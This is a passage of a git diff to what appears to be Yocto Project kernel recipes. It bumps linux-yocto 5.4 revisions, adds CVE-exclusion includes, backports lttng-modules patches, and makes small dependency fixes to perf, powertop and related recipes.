 KERNEL_FEATURES_append_qemuall=" features/kernel-sample/kernel-sample.scc"
+
+# CVE exclusion
+include recipes-kernel/linux/cve-exclusion.inc
diff --git a/meta/recipes-kernel/linux/linux-yocto_5.4.bb b/meta/recipes-kernel/linux/linux-yocto_5.4.bb
index 2a2ba24cd2..108043bd98 100644
--- a/meta/recipes-kernel/linux/linux-yocto_5.4.bb
+++ b/meta/recipes-kernel/linux/linux-yocto_5.4.bb
@@ -1,6 +1,7 @@
 KBRANCH ?= "v5.4/standard/base"
 
 require recipes-kernel/linux/linux-yocto.inc
+include recipes-kernel/linux/cve-exclusion_5.4.inc
 
 # board specific branches
 KBRANCH_qemuarm  ?= "v5.4/standard/arm-versatile-926ejs"
@@ -12,16 +13,16 @@ KBRANCH_qemux86  ?= "v5.4/standard/base"
 KBRANCH_qemux86-64 ?= "v5.4/standard/base"
 KBRANCH_qemumips64 ?= "v5.4/standard/mti-malta64"
 
-SRCREV_machine_qemuarm ?= "561d4f6eb1de32e1448451db86656826cf406eb5"
-SRCREV_machine_qemuarm64 ?= "cfcdd63145c0d741e57ee3e3e58f794229c6c09c"
-SRCREV_machine_qemumips ?= "e421f3f2399c153c4d58241cb6d1be926f7efc45"
-SRCREV_machine_qemuppc ?= "cfcdd63145c0d741e57ee3e3e58f794229c6c09c"
-SRCREV_machine_qemuriscv64 ?= "cfcdd63145c0d741e57ee3e3e58f794229c6c09c"
-SRCREV_machine_qemux86 ?= "cfcdd63145c0d741e57ee3e3e58f794229c6c09c"
-SRCREV_machine_qemux86-64 ?= "cfcdd63145c0d741e57ee3e3e58f794229c6c09c"
-SRCREV_machine_qemumips64 ?= "72d2f11b5f171e196d6b9824b82575d9a7b59e6f"
-SRCREV_machine ?= "cfcdd63145c0d741e57ee3e3e58f794229c6c09c"
-SRCREV_meta ?= "7f765dcb29003bafc9c0ac770147940be6c420b2"
+SRCREV_machine_qemuarm ?= "b7e0891bf4b281c4e29b86f708e10a3339670acc"
+SRCREV_machine_qemuarm64 ?= "ff75f0c7beb167391f0285dd2993394cd143a8a7"
+SRCREV_machine_qemumips ?= "650e43a19e625d1db9d8245cda27db7b86990398"
+SRCREV_machine_qemuppc ?= "0fb6546a09f90befecb11cd0f10274276e8a3021"
+SRCREV_machine_qemuriscv64 ?= "fe901e2f4b156e9cf7ddb03f479f7339d28e398b"
+SRCREV_machine_qemux86 ?= "fe901e2f4b156e9cf7ddb03f479f7339d28e398b"
+SRCREV_machine_qemux86-64 ?= "fe901e2f4b156e9cf7ddb03f479f7339d28e398b"
+SRCREV_machine_qemumips64 ?= "f59947f338319b1741db5dfac34f08399561ab25"
+SRCREV_machine ?= "fe901e2f4b156e9cf7ddb03f479f7339d28e398b"
+SRCREV_meta ?= "ecd382f3477fae022ad1881e4c39e810cdc3c760"
 
 # remap qemuarm to qemuarma15 for the 5.4 kernel
 # KMACHINE_qemuarm ?= "qemuarma15"
@@ -30,7 +31,7 @@ SRC_URI = "git://git.yoctoproject.org/linux-yocto.git;name=machine;branch=${KBRA
            git://git.yoctoproject.org/yocto-kernel-cache;type=kmeta;name=meta;branch=yocto-5.4;destsuffix=${KMETA}"
 
 LIC_FILES_CHKSUM = "file://COPYING;md5=bbea815ee2795b2f4230826c0c6b8814"
-LINUX_VERSION ?= "5.4.69"
+LINUX_VERSION ?= "5.4.273"
 
 DEPENDS += "${@bb.utils.contains('ARCH', 'x86', 'elfutils-native', '', d)}"
 DEPENDS += "openssl-native util-linux-native"
diff --git a/meta/recipes-kernel/lttng/lttng-modules/0017-fix-random-remove-unused-tracepoints-v5.18.patch b/meta/recipes-kernel/lttng/lttng-modules/0017-fix-random-remove-unused-tracepoints-v5.18.patch
new file mode 100644
index 0000000000..3fc7fd733d
--- /dev/null
+++ b/meta/recipes-kernel/lttng/lttng-modules/0017-fix-random-remove-unused-tracepoints-v5.18.patch
@@ -0,0 +1,46 @@
+From 25b70c486bb96de0caf7cea1da42ed07801cca84 Mon Sep 17 00:00:00 2001
+From: Michael Jeanson <mjeanson@efficios.com>
+Date: Mon, 4 Apr 2022 14:33:42 -0400
+Subject: [PATCH 17/19] fix: random: remove unused tracepoints (v5.18)
+
+See upstream commit :
+
+  commit 14c174633f349cb41ea90c2c0aaddac157012f74
+  Author: Jason A. Donenfeld <Jason@zx2c4.com>
+  Date:   Thu Feb 10 16:40:44 2022 +0100
+
+    random: remove unused tracepoints
+
+    These explicit tracepoints aren't really used and show sign of aging.
+    It's work to keep these up to date, and before I attempted to keep them
+    up to date, they weren't up to date, which indicates that they're not
+    really used. These days there are better ways of introspecting anyway.
+
+Upstream-Status: Backport [369d82bb1746447514c877088d7c5fd0f39140f8]
+Change-Id: I3b8c3e2732e7efdd76ce63204ac53a48784d0df6
+Signed-off-by: Michael Jeanson <mjeanson@efficios.com>
+Signed-off-by: Mathieu Desnoyers <mathieu.desnoyers@efficios.com>
+---
+ probes/Kbuild | 5 ++++-
+ 1 file changed, 4 insertions(+), 1 deletion(-)
+
+diff --git a/probes/Kbuild b/probes/Kbuild
+index 3ae2d39e..58da82b8 100644
+--- a/probes/Kbuild
++++ b/probes/Kbuild
+@@ -215,8 +215,11 @@ ifneq ($(CONFIG_FRAME_WARN),0)
+   CFLAGS_lttng-probe-printk.o += -Wframe-larger-than=2200
+ endif
+ 
++# Introduced in v3.6, remove in v5.18
+ obj-$(CONFIG_LTTNG) +=  $(shell \
+-    if [ $(VERSION) -ge 4 \
++    if [ \( ! \( $(VERSION) -ge 6 -o \( $(VERSION) -eq 5 -a $(PATCHLEVEL) -ge 18 \) \) \) \
++      -a \
++      $(VERSION) -ge 4 \
+       -o \( $(VERSION) -eq 3 -a $(PATCHLEVEL) -ge 6 \) \
+       -o \( $(VERSION) -eq 3 -a $(PATCHLEVEL) -eq 5 -a $(SUBLEVEL) -ge 2 \) \
+       -o \( $(VERSION) -eq 3 -a $(PATCHLEVEL) -eq 4 -a $(SUBLEVEL) -ge 9 \) \
+-- 
+2.35.1
+
diff --git a/meta/recipes-kernel/lttng/lttng-modules/0018-fix-random-remove-unused-tracepoints-v5.10-v5.15.patch b/meta/recipes-kernel/lttng/lttng-modules/0018-fix-random-remove-unused-tracepoints-v5.10-v5.15.patch
new file mode 100644
index 0000000000..5c324a9bde
--- /dev/null
+++ b/meta/recipes-kernel/lttng/lttng-modules/0018-fix-random-remove-unused-tracepoints-v5.10-v5.15.patch
@@ -0,0 +1,45 @@
+From da956d1444139883f5d01078d945078738ffade4 Mon Sep 17 00:00:00 2001
+From: He Zhe <zhe.he@windriver.com>
+Date: Thu, 2 Jun 2022 06:36:08 +0000
+Subject: [PATCH 18/19] fix: random: remove unused tracepoints (v5.10, v5.15)
+
+The following kernel commit has been back ported to v5.10.119 and v5.15.44.
+
+commit 14c174633f349cb41ea90c2c0aaddac157012f74
+Author: Jason A. Donenfeld <Jason@zx2c4.com>
+Date:   Thu Feb 10 16:40:44 2022 +0100
+
+  random: remove unused tracepoints
+
+  These explicit tracepoints aren't really used and show sign of aging.
+  It's work to keep these up to date, and before I attempted to keep them
+  up to date, they weren't up to date, which indicates that they're not
+  really used. These days there are better ways of introspecting anyway.
+
+Upstream-Status: Backport [1901e0eb58795e850e8fdcb5e1c235e4397b470d]
+Signed-off-by: He Zhe <zhe.he@windriver.com>
+Signed-off-by: Mathieu Desnoyers <mathieu.desnoyers@efficios.com>
+Change-Id: I0b7eb8aa78b5bd2039e20ae3e1da4c5eb9018789
+---
+ probes/Kbuild | 5 ++++-
+ 1 file changed, 4 insertions(+), 1 deletion(-)
+
+diff --git a/probes/Kbuild b/probes/Kbuild
+index 58da82b8..87f2d681 100644
+--- a/probes/Kbuild
++++ b/probes/Kbuild
+@@ -217,7 +217,10 @@ endif
+ 
+ # Introduced in v3.6, remove in v5.18
+ obj-$(CONFIG_LTTNG) +=  $(shell \
+-    if [ \( ! \( $(VERSION) -ge 6 -o \( $(VERSION) -eq 5 -a $(PATCHLEVEL) -ge 18 \) \) \) \
++    if [ \( ! \( $(VERSION) -ge 6 \
++      -o \( $(VERSION) -eq 5 -a $(PATCHLEVEL) -ge 18 \) \
++      -o \( $(VERSION) -eq 5 -a $(PATCHLEVEL) -eq 15 -a $(SUBLEVEL) -ge 44 \) \
++      -o \( $(VERSION) -eq 5 -a $(PATCHLEVEL) -eq 10 -a $(SUBLEVEL) -ge 119\) \) \) \
+       -a \
+       $(VERSION) -ge 4 \
+       -o \( $(VERSION) -eq 3 -a $(PATCHLEVEL) -ge 6 \) \
+-- 
+2.35.1
+
diff --git a/meta/recipes-kernel/lttng/lttng-modules/0019-fix-random-tracepoints-removed-in-stable-kernels.patch b/meta/recipes-kernel/lttng/lttng-modules/0019-fix-random-tracepoints-removed-in-stable-kernels.patch
new file mode 100644
index 0000000000..73ba4d06bc
--- /dev/null
+++ b/meta/recipes-kernel/lttng/lttng-modules/0019-fix-random-tracepoints-removed-in-stable-kernels.patch
@@ -0,0 +1,51 @@
+From 2c98e0cd03eba0aa935796bc7413c51b5e4b055c Mon Sep 17 00:00:00 2001
+From: Michael Jeanson <mjeanson@efficios.com>
+Date: Tue, 31 May 2022 15:24:48 -0400
+Subject: [PATCH 19/19] fix: 'random' tracepoints removed in stable kernels
+
+The upstream commit 14c174633f349cb41ea90c2c0aaddac157012f74 removing
+the 'random' tracepoints is being backported to multiple stable kernel
+branches, I don't see how that qualifies as a fix but here we are.
+
+Use the presence of 'include/trace/events/random.h' in the kernel source
+tree instead of the rather tortuous version check to determine if we
+need to build 'lttng-probe-random.ko'.
+
+Upstream-Status: Backport [ed1149ef88fb62c365ac66cf62c58ac6abd8d7e8]
+Change-Id: I8f5f2f4c9e09c61127c49c7949b22dd3fab0460d
+Signed-off-by: Michael Jeanson <mjeanson@efficios.com>
+Signed-off-by: Mathieu Desnoyers <mathieu.desnoyers@efficios.com>
+---
+ probes/Kbuild | 16 ++++------------
+ 1 file changed, 4 insertions(+), 12 deletions(-)
+
+diff --git a/probes/Kbuild b/probes/Kbuild
+index 87f2d681..f09d6b65 100644
+--- a/probes/Kbuild
++++ b/probes/Kbuild
+@@ -216,18 +216,10 @@ ifneq ($(CONFIG_FRAME_WARN),0)
+ endif
+ 
+ # Introduced in v3.6, remove in v5.18
+-obj-$(CONFIG_LTTNG) +=  $(shell \
+-    if [ \( ! \( $(VERSION) -ge 6 \
+-      -o \( $(VERSION) -eq 5 -a $(PATCHLEVEL) -ge 18 \) \
+-      -o \( $(VERSION) -eq 5 -a $(PATCHLEVEL) -eq 15 -a $(SUBLEVEL) -ge 44 \) \
+-      -o \( $(VERSION) -eq 5 -a $(PATCHLEVEL) -eq 10 -a $(SUBLEVEL) -ge 119\) \) \) \
+-      -a \
+-      $(VERSION) -ge 4 \
+-      -o \( $(VERSION) -eq 3 -a $(PATCHLEVEL) -ge 6 \) \
+-      -o \( $(VERSION) -eq 3 -a $(PATCHLEVEL) -eq 5 -a $(SUBLEVEL) -ge 2 \) \
+-      -o \( $(VERSION) -eq 3 -a $(PATCHLEVEL) -eq 4 -a $(SUBLEVEL) -ge 9 \) \
+-      -o \( $(VERSION) -eq 3 -a $(PATCHLEVEL) -eq 0 -a $(SUBLEVEL) -ge 41 \) ] ; then \
+-      echo "lttng-probe-random.o" ; fi;)
++random_dep = $(srctree)/include/trace/events/random.h
++ifneq ($(wildcard $(random_dep)),)
++  obj-$(CONFIG_LTTNG) += lttng-probe-random.o
++endif
+ 
+ obj-$(CONFIG_LTTNG) +=  $(shell \
+   if [ $(VERSION) -ge 4 \
+-- 
+2.35.1
+
diff --git a/meta/recipes-kernel/lttng/lttng-modules/fix-jbd2-use-the-correct-print-format.patch b/meta/recipes-kernel/lttng/lttng-modules/fix-jbd2-use-the-correct-print-format.patch
new file mode 100644
index 0000000000..b4939188cc
--- /dev/null
+++ b/meta/recipes-kernel/lttng/lttng-modules/fix-jbd2-use-the-correct-print-format.patch
@@ -0,0 +1,147 @@
+fix: jbd2: use the correct print format
+See upstream commit :
+
+  commit d87a7b4c77a997d5388566dd511ca8e6b8e8a0a8
+  Author: Bixuan Cui <cuibixuan@linux.alibaba.com>
+  Date:   Tue Oct 11 19:33:44 2022 +0800
+
+    jbd2: use the correct print format
+
+    The print format error was found when using ftrace event:
+        <...>-1406 [000] .... 23599442.895823: jbd2_end_commit: dev 252,8 transaction -1866216965 sync 0 head -1866217368
+        <...>-1406 [000] .... 23599442.896299: jbd2_start_commit: dev 252,8 transaction -1866216964 sync 0
+
+    Use the correct print format for transaction, head and tid.
+
+Change-Id: Ic053f0e0c1e24ebc75bae51d07696aaa5e1c0094
+Signed-off-by: Michael Jeanson <mjeanson@efficios.com>
+Signed-off-by: Mathieu Desnoyers <mathieu.desnoyers@efficios.com>
+
+Upstream-status: Backport
+Signed-off-by: Steve Sakoman <steve@sakoman.com>
+Note: combines three upstream commits:
+https://github.com/lttng/lttng-modules/commit/b28830a0dcdf95ec3e6b390b4d032667deaad0c0
+https://github.com/lttng/lttng-modules/commit/4fd2615b87b3cac0fd5bdc5fc82db05f6fcfdecf
+https://github.com/lttng/lttng-modules/commit/612c99eb24bf72f4d47d02025e92de8c35ece14e
+
+diff --git a/instrumentation/events/lttng-module/jbd2.h b/instrumentation/events/lttng-module/jbd2.h
+--- a/instrumentation/events/lttng-module/jbd2.h
++++ b/instrumentation/events/lttng-module/jbd2.h
+@@ -29,6 +29,25 @@ LTTNG_TRACEPOINT_EVENT(jbd2_checkpoint,
+ 	)
+ )
+ 
++#if (LTTNG_LINUX_VERSION_CODE >= LTTNG_KERNEL_VERSION(6,2,0) \
++	|| LTTNG_KERNEL_RANGE(5,4,229, 5,5,0) \
++	|| LTTNG_KERNEL_RANGE(5,10,163, 5,11,0) \
++	|| LTTNG_KERNEL_RANGE(5,15,87, 5,16,0) \
++	|| LTTNG_KERNEL_RANGE(6,0,18, 6,1,0) \
++	|| LTTNG_KERNEL_RANGE(6,1,4, 6,2,0))
++LTTNG_TRACEPOINT_EVENT_CLASS(jbd2_commit,
++
++	TP_PROTO(journal_t *journal, transaction_t *commit_transaction),
++
++	TP_ARGS(journal, commit_transaction),
++
++	TP_FIELDS(
++		ctf_integer(dev_t, dev, journal->j_fs_dev->bd_dev)
++		ctf_integer(char, sync_commit, commit_transaction->t_synchronous_commit)
++		ctf_integer(tid_t, transaction, commit_transaction->t_tid)
++	)
++)
++#else
+ LTTNG_TRACEPOINT_EVENT_CLASS(jbd2_commit,
+ 
+ 	TP_PROTO(journal_t *journal, transaction_t *commit_transaction),
+@@ -41,6 +60,7 @@ LTTNG_TRACEPOINT_EVENT_CLASS(jbd2_commit
+ 		ctf_integer(int, transaction, commit_transaction->t_tid)
+ 	)
+ )
++#endif
+ 
+ LTTNG_TRACEPOINT_EVENT_INSTANCE(jbd2_commit, jbd2_start_commit,
+ 
+@@ -79,6 +99,25 @@ LTTNG_TRACEPOINT_EVENT_INSTANCE(jbd2_com
+ )
+ #endif
+ 
++#if (LTTNG_LINUX_VERSION_CODE >= LTTNG_KERNEL_VERSION(6,2,0) \
++	|| LTTNG_KERNEL_RANGE(5,4,229, 5,5,0) \
++	|| LTTNG_KERNEL_RANGE(5,10,163, 5,11,0) \
++	|| LTTNG_KERNEL_RANGE(5,15,87, 5,16,0) \
++	|| LTTNG_KERNEL_RANGE(6,0,18, 6,1,0) \
++	|| LTTNG_KERNEL_RANGE(6,1,4, 6,2,0))
++LTTNG_TRACEPOINT_EVENT(jbd2_end_commit,
++	TP_PROTO(journal_t *journal, transaction_t *commit_transaction),
++
++	TP_ARGS(journal, commit_transaction),
++
++	TP_FIELDS(
++		ctf_integer(dev_t, dev, journal->j_fs_dev->bd_dev)
++		ctf_integer(char, sync_commit, commit_transaction->t_synchronous_commit)
++		ctf_integer(tid_t, transaction, commit_transaction->t_tid)
++		ctf_integer(tid_t, head, journal->j_tail_sequence)
++	)
++)
++#else
+ LTTNG_TRACEPOINT_EVENT(jbd2_end_commit,
+ 	TP_PROTO(journal_t *journal, transaction_t *commit_transaction),
+ 
+@@ -91,6 +130,7 @@ LTTNG_TRACEPOINT_EVENT(jbd2_end_commit,
+ 		ctf_integer(int, head, journal->j_tail_sequence)
+ 	)
+ )
++#endif
+ 
+ LTTNG_TRACEPOINT_EVENT(jbd2_submit_inode_data,
+ 	TP_PROTO(struct inode *inode),
+@@ -103,7 +143,48 @@ LTTNG_TRACEPOINT_EVENT(jbd2_submit_inode
+ 	)
+ )
+ 
+-#if (LTTNG_LINUX_VERSION_CODE >= LTTNG_KERNEL_VERSION(2,6,32))
++#if (LTTNG_LINUX_VERSION_CODE >= LTTNG_KERNEL_VERSION(6,2,0) \
++	|| LTTNG_KERNEL_RANGE(5,4,229, 5,5,0) \
++	|| LTTNG_KERNEL_RANGE(5,10,163, 5,11,0) \
++	|| LTTNG_KERNEL_RANGE(5,15,87, 5,16,0) \
++	|| LTTNG_KERNEL_RANGE(6,0,18, 6,1,0) \
++	|| LTTNG_KERNEL_RANGE(6,1,4, 6,2,0))
++LTTNG_TRACEPOINT_EVENT(jbd2_run_stats,
++	TP_PROTO(dev_t dev, tid_t tid,
++		 struct transaction_run_stats_s *stats),
++
++	TP_ARGS(dev, tid, stats),
++
++	TP_FIELDS(
++		ctf_integer(dev_t, dev, dev)
++		ctf_integer(tid_t, tid, tid)
++		ctf_integer(unsigned long, wait, stats->rs_wait)
++		ctf_integer(unsigned long, running, stats->rs_running)
++		ctf_integer(unsigned long, locked, stats->rs_locked)
++		ctf_integer(unsigned long, flushing, stats->rs_flushing)
++		ctf_integer(unsigned long, logging, stats->rs_logging)
++		ctf_integer(__u32, handle_count, stats->rs_handle_count)
++		ctf_integer(__u32, blocks, stats->rs_blocks)
++		ctf_integer(__u32, blocks_logged, stats->rs_blocks_logged)
++	)
++)
++
++LTTNG_TRACEPOINT_EVENT(jbd2_checkpoint_stats,
++	TP_PROTO(dev_t dev, tid_t tid,
++		 struct transaction_chp_stats_s *stats),
++
++	TP_ARGS(dev, tid, stats),
++
++	TP_FIELDS(
++		ctf_integer(dev_t, dev, dev)
++		ctf_integer(tid_t, tid, tid)
++		ctf_integer(unsigned long, chp_time, stats->cs_chp_time)
++		ctf_integer(__u32, forced_to_close, stats->cs_forced_to_close)
++		ctf_integer(__u32, written, stats->cs_written)
++		ctf_integer(__u32, dropped, stats->cs_dropped)
++	)
++)
++#else
+ LTTNG_TRACEPOINT_EVENT(jbd2_run_stats,
+ 	TP_PROTO(dev_t dev, unsigned long tid,
+ 		 struct transaction_run_stats_s *stats),
diff --git a/meta/recipes-kernel/lttng/lttng-modules_2.11.6.bb b/meta/recipes-kernel/lttng/lttng-modules_2.11.9.bb
index a38d8afb7a..8e9c44241b 100644
--- a/meta/recipes-kernel/lttng/lttng-modules_2.11.6.bb
+++ b/meta/recipes-kernel/lttng/lttng-modules_2.11.9.bb
@@ -1,6 +1,7 @@
 SECTION = "devel"
 SUMMARY = "Linux Trace Toolkit KERNEL MODULE"
 DESCRIPTION = "The lttng-modules 2.0 package contains the kernel tracer modules"
+HOMEPAGE = "https://lttng.org/"
 LICENSE = "LGPLv2.1 & GPLv2 & MIT"
 LIC_FILES_CHKSUM = "file://LICENSE;md5=3f882d431dc0f32f1f44c0707aa41128"
 
@@ -11,10 +12,14 @@ COMPATIBLE_HOST = '(x86_64|i.86|powerpc|aarch64|mips|nios2|arm|riscv).*-linux'
 SRC_URI = "https://lttng.org/files/${BPN}/${BPN}-${PV}.tar.bz2 \
            file://Makefile-Do-not-fail-if-CONFIG_TRACEPOINTS-is-not-en.patch \
            file://BUILD_RUNTIME_BUG_ON-vs-gcc7.patch \
+           file://0017-fix-random-remove-unused-tracepoints-v5.18.patch \
+           file://0018-fix-random-remove-unused-tracepoints-v5.10-v5.15.patch \
+           file://0019-fix-random-tracepoints-removed-in-stable-kernels.patch \
+           file://fix-jbd2-use-the-correct-print-format.patch \
            "
 
-SRC_URI[md5sum] = "8ef09fdfcdec669d33f7fc1c1c80f2c4"
-SRC_URI[sha256sum] = "23372811cdcd2ac28ba8c9d09484ed5f9238cfbd0043f8c663ff3875ba9c8566"
+SRC_URI[md5sum] = "cfb23ea6bdaf1ad40c7f9ac098b4016d"
+SRC_URI[sha256sum] = "0c5fe9f8d8dbd1411a3c1c643dcbd0a55577bd15845758b73948e00bc7c387a6"
 
 export INSTALL_MOD_DIR="kernel/lttng-modules"
 
@@ -22,7 +27,9 @@ EXTRA_OEMAKE += "KERNELDIR='${STAGING_KERNEL_DIR}'"
 
 do_install_append() {
 	# Delete empty directories to avoid QA failures if no modules were built
-	find ${D}/${nonarch_base_libdir} -depth -type d -empty -exec rmdir {} \;
+	if [ -d ${D}/${nonarch_base_libdir} ]; then
+		find ${D}/${nonarch_base_libdir} -depth -type d -empty -exec rmdir {} \;
+	fi
 }
 
 python do_package_prepend() {
diff --git a/meta/recipes-kernel/lttng/lttng-tools_2.11.5.bb b/meta/recipes-kernel/lttng/lttng-tools_2.11.5.bb
index a969fffd62..6306193809 100644
--- a/meta/recipes-kernel/lttng/lttng-tools_2.11.5.bb
+++ b/meta/recipes-kernel/lttng/lttng-tools_2.11.5.bb
@@ -3,13 +3,14 @@ SUMMARY = "Linux Trace Toolkit Control"
 DESCRIPTION = "The Linux trace toolkit is a suite of tools designed \
 to extract program execution details from the Linux operating system \
 and interpret them."
+HOMEPAGE = "https://github.com/lttng/lttng-tools"
 
 LICENSE = "GPLv2 & LGPLv2.1"
 LIC_FILES_CHKSUM = "file://LICENSE;md5=01d7fc4496aacf37d90df90b90b0cac1 \
                     file://gpl-2.0.txt;md5=b234ee4d69f5fce4486a80fdaf4a4263 \
                     file://lgpl-2.1.txt;md5=0f0d71500e6a57fd24d825f33242b9ca"
 
-DEPENDS = "liburcu popt libxml2 util-linux"
+DEPENDS = "liburcu popt libxml2 util-linux bison-native"
 RDEPENDS_${PN} = "libgcc"
 RDEPENDS_${PN}-ptest += "make perl bash gawk babeltrace procps perl-module-overloading coreutils util-linux kmod lttng-modules sed python3-core"
 RDEPENDS_${PN}-ptest_append_libc-glibc = " glibc-utils"
diff --git a/meta/recipes-kernel/make-mod-scripts/make-mod-scripts_1.0.bb b/meta/recipes-kernel/make-mod-scripts/make-mod-scripts_1.0.bb
index c7edb20ee4..32b89bb5ea 100644
--- a/meta/recipes-kernel/make-mod-scripts/make-mod-scripts_1.0.bb
+++ b/meta/recipes-kernel/make-mod-scripts/make-mod-scripts_1.0.bb
@@ -1,8 +1,9 @@
 SUMMARY = "Build tools needed by external modules"
+HOMEPAGE = "https://www.yoctoproject.org/"
 LICENSE = "GPLv2"
 LIC_FILES_CHKSUM = "file://${COREBASE}/meta/files/common-licenses/GPL-2.0;md5=801f80980d171dd6425610833a22dbe6"
 
-inherit kernel-arch
+inherit kernel-arch linux-kernel-base
 inherit pkgconfig
 
 PACKAGE_ARCH = "${MACHINE_ARCH}"
@@ -15,8 +16,10 @@ do_compile[depends] += "virtual/kernel:do_compile_kernelmodules"
 RDEPENDS_${PN}-dev = ""
 
 DEPENDS += "bc-native bison-native"
+DEPENDS += "gmp-native"
 
 EXTRA_OEMAKE = " HOSTCC="${BUILD_CC} ${BUILD_CFLAGS} ${BUILD_LDFLAGS}" HOSTCPP="${BUILD_CPP}""
+EXTRA_OEMAKE += " HOSTCXX="${BUILD_CXX} ${BUILD_CXXFLAGS} ${BUILD_LDFLAGS}" CROSS_COMPILE=${TARGET_PREFIX}"
 
 # Build some host tools under work-shared.  CC, LD, and AR are probably
 # not used, but this is the historical way of invoking "make scripts".
diff --git a/meta/recipes-kernel/modutils-initscripts/files/modutils.sh b/meta/recipes-kernel/modutils-initscripts/files/modutils.sh
index a78adf5729..df37bfe7a1 100755
--- a/meta/recipes-kernel/modutils-initscripts/files/modutils.sh
+++ b/meta/recipes-kernel/modutils-initscripts/files/modutils.sh
@@ -18,7 +18,7 @@ LOAD_MODULE=modprobe
 
 if [ ! -f /lib/modules/`uname -r`/modules.dep ]; then
 	[ "$VERBOSE" != no ] && echo "Calculating module dependencies ..."
-	depmod -Ae
+	depmod -a
 fi
 
 loaded_modules=" "
diff --git a/meta/recipes-kernel/perf/perf.bb b/meta/recipes-kernel/perf/perf.bb
index 578b871e9e..42621e47d3 100644
--- a/meta/recipes-kernel/perf/perf.bb
+++ b/meta/recipes-kernel/perf/perf.bb
@@ -9,11 +9,11 @@ HOMEPAGE = "https://perf.wiki.kernel.org/index.php/Main_Page"
 
 LICENSE = "GPLv2"
 
-PR = "r9"
+PR = "r10"
 
 PACKAGECONFIG ??= "scripting tui libunwind"
 PACKAGECONFIG[dwarf] = ",NO_DWARF=1"
-PACKAGECONFIG[scripting] = ",NO_LIBPERL=1 NO_LIBPYTHON=1,perl python3"
+PACKAGECONFIG[scripting] = ",NO_LIBPERL=1 NO_LIBPYTHON=1,perl python3 python3-setuptools-native"
 # gui support was added with kernel 3.6.35
 # since 3.10 libnewt was replaced by slang
 # to cover a wide range of kernel we add both dependencies
@@ -45,7 +45,7 @@ PROVIDES = "virtual/perf"
 inherit linux-kernel-base kernel-arch manpages
 
 # needed for building the tools/perf Python bindings
-inherit ${@bb.utils.contains('PACKAGECONFIG', 'scripting', 'python3native', '', d)}
+inherit ${@bb.utils.contains('PACKAGECONFIG', 'scripting', 'python3targetconfig', '', d)}
 inherit python3-dir
 export PYTHON_SITEPACKAGES_DIR
 
@@ -265,9 +265,9 @@ PACKAGES =+ "${PN}-archive ${PN}-tests ${PN}-perl ${PN}-python"
 
 RDEPENDS_${PN} += "elfutils bash"
 RDEPENDS_${PN}-archive =+ "bash"
-RDEPENDS_${PN}-python =+ "bash python3 python3-modules ${@bb.utils.contains('PACKAGECONFIG', 'audit', 'audit-python3', '', d)}"
+RDEPENDS_${PN}-python =+ "bash python3 python3-modules ${@bb.utils.contains('PACKAGECONFIG', 'audit', 'audit-python', '', d)}"
 RDEPENDS_${PN}-perl =+ "bash perl perl-modules"
-RDEPENDS_${PN}-tests =+ "python3"
+RDEPENDS_${PN}-tests =+ "python3 bash"
 
 RSUGGESTS_SCRIPTING = "${@bb.utils.contains('PACKAGECONFIG', 'scripting', '${PN}-perl ${PN}-python', '',d)}"
 RSUGGESTS_${PN} += "${PN}-archive ${PN}-tests ${RSUGGESTS_SCRIPTING}"
diff --git a/meta/recipes-kernel/powertop/powertop/0002-configure.ac-ax_add_fortify_source.patch b/meta/recipes-kernel/powertop/powertop/0002-configure.ac-ax_add_fortify_source.patch
new file mode 100644
index 0000000000..4ccbdbfcd1
--- /dev/null
+++ b/meta/recipes-kernel/powertop/powertop/0002-configure.ac-ax_add_fortify_source.patch
@@ -0,0 +1,70 @@
+From 0d833743954ac1c58773cbf7a78fe0dc8105ae4a Mon Sep 17 00:00:00 2001
+From: Joe Konno <joe.konno@linux.intel.com>
+Date: Tue, 11 Feb 2020 14:15:42 -0800
+Subject: [PATCH] configure.ac: ax_add_fortify_source
+
+Use a maintained autoconf-archive macro to determine whether we need to
+add -D_FORTIFY_SOURCE=3D2, or if the underlying OS (or toolchain) has it
+baked in.
+
+Signed-off-by: Joe Konno <joe.konno@intel.com>
+
+Fixes:
+  aclocal: error: too many loops
+
+Upstream-Status: Backport from 2.12
+Signed-off-by: Tim Orling <timothy.t.orling@intel.com>
+---
+ configure.ac                |  2 +-
+ m4/gcc_fortify_source_cc.m4 | 29 -----------------------------
+ 2 files changed, 1 insertion(+), 30 deletions(-)
+ delete mode 100644 m4/gcc_fortify_source_cc.m4
+
+diff --git a/configure.ac b/configure.ac
+index d6a15e1..d68369c 100644
+--- a/configure.ac
++++ b/configure.ac
+@@ -36,7 +36,7 @@ AC_PROG_LIBTOOL
+ AC_PROG_CC
+ AC_PROG_INSTALL
+ AM_PROG_CC_C_O
+-GCC_FORTIFY_SOURCE_CC
++AX_ADD_FORTIFY_SOURCE
+ AX_CXX_COMPILE_STDCXX_11([noext], [mandatory])
+ 
+ # Checks for libraries.
+diff --git a/m4/gcc_fortify_source_cc.m4 b/m4/gcc_fortify_source_cc.m4
+deleted file mode 100644
+index 1206672..0000000
+--- a/m4/gcc_fortify_source_cc.m4
++++ /dev/null
+@@ -1,29 +0,0 @@
+-dnl GCC_FORTIFY_SOURCE_CC
+-dnl checks -D_FORTIFY_SOURCE with the C++ compiler, if it exists then
+-dnl updates CXXCPP
+-AC_DEFUN([GCC_FORTIFY_SOURCE_CC],[
+-  AC_LANG_ASSERT([C++])
+-  AS_IF([test "X$CXX" != "X"], [
+-    AC_MSG_CHECKING([for FORTIFY_SOURCE support])
+-    fs_old_cxxcpp="$CXXCPP"
+-    fs_old_cxxflags="$CXXFLAGS"
+-    CXXCPP="$CXXCPP -D_FORTIFY_SOURCE=2"
+-    CXXFLAGS="$CXXFLAGS -Werror"
+-    AC_COMPILE_IFELSE([
+-      AC_LANG_PROGRAM([[]], [[
+-        int main(void) {
+-        #if !(__GNUC_PREREQ (4, 1) )
+-        #error No FORTIFY_SOURCE support
+-        #endif
+-          return 0;
+-        }
+-      ]], [
+-        AC_MSG_RESULT([yes])
+-      ], [
+-        AC_MSG_RESULT([no])
+-        CXXCPP="$fs_old_cxxcpp"
+-      ])
+-    ])
+-    CXXFLAGS="$fs_old_cxxflags"
+-  ])
+-])
diff --git a/meta/recipes-kernel/powertop/powertop/0003-configure-Use-AX_REQUIRE_DEFINED.patch b/meta/recipes-kernel/powertop/powertop/0003-configure-Use-AX_REQUIRE_DEFINED.patch
new file mode 100644
index 0000000000..ac728f4a39
--- /dev/null
+++ b/meta/recipes-kernel/powertop/powertop/0003-configure-Use-AX_REQUIRE_DEFINED.patch
@@ -0,0 +1,29 @@
+From fbf74492236676e844b021b0dbb45b1ca43a0410 Mon Sep 17 00:00:00 2001
+From: David King <amigadave@amigadave.com>
